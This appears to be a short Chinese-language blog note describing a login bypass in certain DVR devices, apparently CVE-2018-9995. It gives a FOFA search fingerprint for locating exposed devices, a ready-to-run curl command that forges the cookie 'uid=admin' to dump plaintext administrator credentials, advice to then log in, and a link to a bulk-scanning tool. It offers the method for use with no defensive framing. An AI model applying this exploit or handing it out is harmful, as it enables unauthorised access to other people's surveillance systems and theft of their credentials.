DVR登录绕过漏洞

————背景说明————

个人方面没什么意图，主要之前有一次要做个赋能，顺口讲了一下，其实很简单，就简单记录一下。

此漏洞通过修改”Cookie:uid=admin”，以此访问特定DVR的控制面板，并可以返回此设备的明文管理员凭证。

 

————实验过程————

fofa搜索特征："/longin.rsp"

 

 

利用方式：curl "http://URL/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

 

 然后登录呗

也可以使用批量检测工具，我没用过，附上地址自己参考

https://github.com/ezelf/CVE-2018-9995_dvr_credentials